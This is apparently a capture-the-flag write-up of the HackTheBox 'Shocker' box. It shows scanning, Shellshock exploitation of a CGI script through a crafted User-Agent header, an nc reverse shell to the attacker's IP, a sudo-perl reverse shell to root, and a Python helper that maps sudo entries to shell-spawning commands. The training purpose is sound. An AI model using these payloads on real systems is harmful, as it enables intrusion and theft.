TJnull OSCP Prep Series
HackTheBox: Shocker [OSCP Prep]

  • OS: Linux 🐧
  • Difficulty: Easy 😇
  • Release: 30 Sep 2017 📅
  • IP: 10.10.10.56 💻
  • Box Creator: mrb3n 😎

Hello there guys. Welcome to my 5th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Shocker from HackTheBox.

Let’s begin with a full port scan (1-65535) to see what is listening. I used Rustscan because it finds the open ports quickly and then hands only those ports to Nmap for service detection (-sV) and default scripts (-sC); -Pn skips host discovery, which is handy on a VPN where ICMP may be filtered:

$ rustscan -a 10.10.10.56 -r 1-65535 -b 65 -- -sV -sC -Pn
PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

SSH usually listens on port 22, but here it runs on port 2222. There are a few common reasons for this:

  • The sysadmin moved SSH off the default port to cut down on automated brute-force noise and casual scans. This is obscurity, not security: a full-range scan like the one above still finds it.
  • It is a second sshd, possibly a backdoor that another attacker has set up alongside (or instead of) the normal service.

Let’s keep SSH in the back of our mind for now (the banner shows OpenSSH 7.2p2 on Ubuntu, with no obvious quick win) and move on to HTTP. I started directory busting with dirsearch:

$ dirsearch -u "http://10.10.10.56/"

Target: http://10.10.10.56/

[22:31:54] Starting: 
[22:32:01] 403 -  297B  - /.ht_wsr.txt
[22:32:02] 403 -  300B  - /.htaccess_orig
[22:32:02] 403 -  298B  - /.htaccess_sc
[22:32:02] 403 -  301B  - /.htaccess_extra
[22:32:02] 403 -  298B  - /.htaccessBAK
[22:32:02] 403 -  300B  - /.htaccess.orig
[22:32:02] 403 -  300B  - /.htaccess.bak1
[22:32:02] 403 -  298B  - /.htaccessOLD
[22:32:02] 403 -  302B  - /.htaccess.sample
[22:32:02] 403 -  299B  - /.htaccessOLD2
[22:32:02] 403 -  290B  - /.htm
[22:32:02] 403 -  291B  - /.html
[22:32:02] 403 -  300B  - /.htaccess.save
[22:32:02] 403 -  296B  - /.htpasswds
[22:32:02] 403 -  297B  - /.httr-oauth
[22:32:02] 403 -  300B  - /.htpasswd_test
[22:32:46] 403 -  294B  - /cgi-bin/
[22:33:03] 200 -  137B  - /index.html
[22:33:26] 403 -  299B  - /server-status
[22:33:26] 403 -  300B  - /server-status/

Task Completed

We get a bunch of 403 (Forbidden) responses. The .ht* entries are noise: Apache’s default configuration denies access to any file beginning with .ht, so those 403s say nothing about whether the files exist. /cgi-bin/ is different: the 403 there only means directory listing is disabled, and the scripts inside it may still be executable by anyone.

/cgi-bin is the conventional directory for CGI scripts. A CGI script is an external program that the web server runs once per request, passing the request details to it as environment variables (the query string, the method and every HTTP header, so User-Agent becomes HTTP_USER_AGENT) and returning whatever the program prints as the response. That "headers become environment variables" detail is what makes this directory interesting from a security standpoint. You can learn more here.

Let’s hunt for CGI scripts that live in the /cgi-bin directory, trying a few likely extensions:

$ dirsearch -u http://10.10.10.56/cgi-bin -e php,py,js,sh

Target: http://10.10.10.56/cgi-bin/

[22:57:54] Starting: 
[22:58:00] 403 -  305B  - /cgi-bin/.ht_wsr.txt
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.bak1
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.orig
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.save
[22:58:00] 403 -  310B  - /cgi-bin/.htaccess.sample
[22:58:00] 403 -  309B  - /cgi-bin/.htaccess_extra
[22:58:00] 403 -  306B  - /cgi-bin/.htaccess_sc
[22:58:00] 403 -  307B  - /cgi-bin/.htaccessOLD2
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess_orig
[22:58:00] 403 -  299B  - /cgi-bin/.html
[22:58:00] 403 -  306B  - /cgi-bin/.htaccessOLD
[22:58:00] 403 -  298B  - /cgi-bin/.htm
[22:58:00] 403 -  306B  - /cgi-bin/.htaccessBAK
[22:58:01] 403 -  308B  - /cgi-bin/.htpasswd_test
[22:58:01] 403 -  304B  - /cgi-bin/.htpasswds
[22:58:01] 403 -  305B  - /cgi-bin/.httr-oauth
[22:59:01] 200 -  118B  - /cgi-bin/user.sh

Task Completed

/cgi-bin/user.sh looks interesting to us. This is what we get when requesting the script (the server executes it and returns its output):

Figure 1.0

The .sh extension suggests the CGI script is written in bash. Bash versions before the September 2014 patches are vulnerable to Shellshock (CVE-2014-6271 and follow-ups): when bash imports an environment variable whose value begins with () { ... }, it treats the value as a function definition and, due to the bug, keeps executing whatever commands follow the closing brace. Because the web server copies our request headers into the environment of the CGI script, we can place such a value in a header and have bash run our command. You can learn more about Shellshock here and here. Let’s try to exploit it.

Exploitation

Payload (Dump /etc/passwd):

() { :; }; echo; /bin/bash -c 'cat /etc/passwd'

The idea is to inject the payload into an HTTP header; here we use User-Agent, which Apache exports as HTTP_USER_AGENT. Any header that reaches the environment would do (Referer, Cookie and so on). The leading () { :; }; is the (empty) function definition that triggers the bug, and the echo; is not decoration: it prints the blank line that terminates the CGI response headers, so Apache returns our command output as a 200 body instead of a 500 "malformed header" error. A harmless command (echo of a marker, or id) is the right first probe before dumping files.

curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'cat /etc/passwd'"
Figure 1.1: Content of the /etc/passwd file

Now let’s get a shell, shall we? With a listener waiting on our attacking machine (10.10.14.17, port 1337), the same injection point runs a mkfifo-based reverse shell:

curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 1337 >/tmp/f'"

Post-Exploitation

List what the current user is allowed to run through sudo:

Figure 1.2: sudo -l

Perl can be run as root without a password prompt (a NOPASSWD entry). Since perl can spawn a shell directly, that is effectively a root shell; the write-up uses it to open a second reverse shell, this time to port 1338:

sudo -u root perl -e 'use Socket;$i="10.10.14.17";$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

The listener on port 1338 receives a shell running as root.

Figure 1.3: Got a root shell
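The post-exploitation step above (read sudo -l, spot a NOPASSWD interpreter, turn it into a root shell) is worth automating for enumeration, so here is an added example that is not part of the original write-up: it parses sudo -l output, flags entries that run as root through a shell-capable binary, and maps each to a known shell-spawning invocation. The sample output is constructed (the user and host names are placeholders, and the box's real sudo -l is only shown as a figure above); the per-binary commands are the standard ones documented on GTFOBins.

```python
import os
import re

# Constructed sample of `sudo -l` output for a low-privilege user; placeholder names.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lowpriv on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User lowpriv may run the following commands on target:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get
"""

# Local shell invocations for a few binaries that can run arbitrary code on their own.
SHELL_SPAWN = {
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "bash": "sudo bash",
    "env": "sudo env /bin/sh",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
}

# One sudoers entry as printed by `sudo -l`: "(runas) [TAG: ...] command [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(output):
    """Return the command entries from `sudo -l` output as dicts with
    runas user, whether NOPASSWD applies, and the command string."""
    entries = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # everything after this header is an entry
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        entries.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "cmd": m.group("cmd")})
    return entries


def escalation_candidates(entries):
    """Keep entries that run as root (or ALL) via a binary we know can spawn a shell.
    Entries needing a password are kept too: they still matter once a password is known."""
    out = []
    for e in entries:
        binary = os.path.basename(e["cmd"].split()[0])
        if e["runas"] in ("root", "ALL") and binary in SHELL_SPAWN:
            out.append({**e, "binary": binary, "shell": SHELL_SPAWN[binary]})
    return out


if __name__ == "__main__":
    for c in escalation_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if c["nopasswd"] else "password required"
        print(f"{c['cmd']} as {c['runas']} ({tag}): {c['shell']}")
```

Feed it the real output with `sudo -l | python3 thisfile.py` after swapping the sample for `sys.stdin.read()`; the point is that a NOPASSWD line for any interpreter is a root shell, whether or not a second listener is involved.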

I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.
